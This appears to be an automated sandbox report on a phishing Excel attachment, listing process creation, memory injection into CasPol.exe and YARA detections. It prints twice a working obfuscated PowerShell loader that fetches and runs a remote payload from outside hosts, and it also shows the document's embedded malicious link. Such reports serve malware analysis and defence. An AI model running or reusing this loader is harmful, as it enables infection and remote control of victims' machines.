[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	31_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00401806 NtdllDefWindowProc_W,	31_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004018C0 NtdllDefWindowProc_W,	31_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004016FD NtdllDefWindowProc_A,	41_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004017B7 NtdllDefWindowProc_A,	41_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402CAC NtdllDefWindowProc_A,	42_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402D66 NtdllDefWindowProc_A,	42_2_00402D66

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B040	31_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0043610D	31_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00447310	31_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044A490	31_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040755A	31_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0043C560	31_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B610	31_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044D6C0	31_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004476F0	31_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B870	31_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044081D	31_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00414957	31_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004079EE	31_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00407AEB	31_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044AA80	31_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00412AA9	31_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404B74	31_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404B03	31_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044BBD8	31_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404BE5	31_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404C76	31_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00415CFE	31_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00416D72	31_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00446D30	31_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00446D8B	31_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00406E8F	31_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00405038	41_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0041208C	41_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004050A9	41_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0040511A	41_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043C13A	41_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004051AB	41_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00449300	41_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0040D322	41_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A4F0	41_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043A5AB	41_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00413631	41_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00446690	41_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A730	41_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004398D8	41_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004498E0	41_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A886	41_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043DA09	41_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00438D5E	41_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00449ED0	41_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0041FE83	41_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00430F54	41_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004050C2	42_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004014AB	42_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00405133	42_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004051A4	42_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00401246	42_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_0040CA46	42_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00405235	42_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004032C8	42_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00401689	42_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402F60	42_2_00402F60

Document embeds suspicious OLE2 link

Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C\|/".3<AjDl?/a\|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlpIU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH
Source: 7B130000.0.dr	Stream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C\|/".3<AjDl?/a\|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlpIU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE74F55484018A372.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00416760 appears 69 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286

Yara signature match

Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@76/50@10/8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

31_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 42_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,

42_2_00410DE1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

31_2_00418758

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

31_2_00413D4C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

31_2_0040B58D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\7B130000

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7DB7.tmp

Jump to behavior

Source: A & C Metrology OC 545714677889Materiale.xls	OLE indicator, Workbook stream: true
Source: 7B130000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m..............................................................3......X...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................X...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@.].............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......&.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0'i.....UVck......h.....(.P.......................&..... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E...................&.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...................&.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....&.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......@.].....}..w............0'i.....UVck......h.....(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................@b..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m.......!.......................!.......!......................3........................!.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... ...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...o.....^..l....X.n.....(.P.....8.......x............... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E.8.......x...............@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.8.......x...............@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x...............l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............8.......8.......@"......(.P.....................................................
